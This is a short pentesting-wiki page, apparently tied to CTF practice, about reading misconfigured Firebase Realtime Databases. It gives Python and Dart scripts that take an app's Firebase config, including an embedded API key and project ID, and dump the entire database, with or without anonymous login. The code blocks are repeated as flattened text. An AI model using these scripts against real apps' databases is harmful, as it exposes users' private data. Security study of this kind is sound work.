Abusing Firebase

Firebase provides detailed documentation and cross-platform app development SDKs, to help you build and ship apps for iOS, Android, the web, Flutter, Unity, and C++. The Firebase Realtime Database is a cloud-hosted database. Data is stored as JSON and synchronized in realtime to every connected client.

Some mobile applications that have firebase its Firebase is not restricted and can be accessed to its database by simple curl command

If the firebase is configured to depend on specific values such as:

    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"

you can use 2 methods it depends on if it needs anonymous login or not

Without anonymous login (Python):

import pyrebase

config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}

firebase = pyrebase.initialize_app(config)

db = firebase.database()

print(db.get())

With anonymous login (Dart):

import 'dart:convert';
import 'dart:io';
import 'dart:typed_data';

import 'package:firebase_dart/auth.dart';
import 'package:firebase_dart/core.dart';
import 'package:firebase_dart/database.dart';
import 'package:firebase_dart/implementation/pure_dart.dart';
import 'package:firebase_dart/storage.dart';

void main() async {
  FirebaseDart.setup();

  var options = FirebaseOptions(
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
      );

  var app = await Firebase.initializeApp(options: options);
  var auth = FirebaseAuth.instanceFor(app: app);
  await auth.signInAnonymously();
  var database = FirebaseDatabase(app: app);
  var dbRef = database.reference();
  var snap = await dbRef.once();

  print('Flag : ${snap.value}');
}

PreviousAndroid Malwares NextRoot Detection

Last updated 1 year ago

appId: "1:713169998830:android:ee341ad82ed5dd924534ff", apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw", messagingSenderId: "", authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com", databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com", storageBucket: "my-ctf-2e70b.appspot.com", projectId: "my-ctf-2e70b"

import pyrebase config = { "apiKey": "FIREBASE_API_KEY", "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com", "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com", "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com", } firebase = pyrebase.initialize_app(config) db = firebase.database() print(db.get())

import 'dart:convert'; import 'dart:io'; import 'dart:typed_data'; import 'package:firebase_dart/auth.dart'; import 'package:firebase_dart/core.dart'; import 'package:firebase_dart/database.dart'; import 'package:firebase_dart/implementation/pure_dart.dart'; import 'package:firebase_dart/storage.dart'; void main() async { FirebaseDart.setup(); var options = FirebaseOptions( appId: "1:713169998830:android:ee341ad82ed5dd924534ff", apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw", messagingSenderId: "", authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com", databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com", storageBucket: "my-ctf-2e70b.appspot.com", projectId: "my-ctf-2e70b" ); var app = await Firebase.initializeApp(options: options); var auth = FirebaseAuth.instanceFor(app: app); await auth.signInAnonymously(); var database = FirebaseDatabase(app: app); var dbRef = database.reference(); var snap = await dbRef.once(); print('Flag : ${snap.value}'); }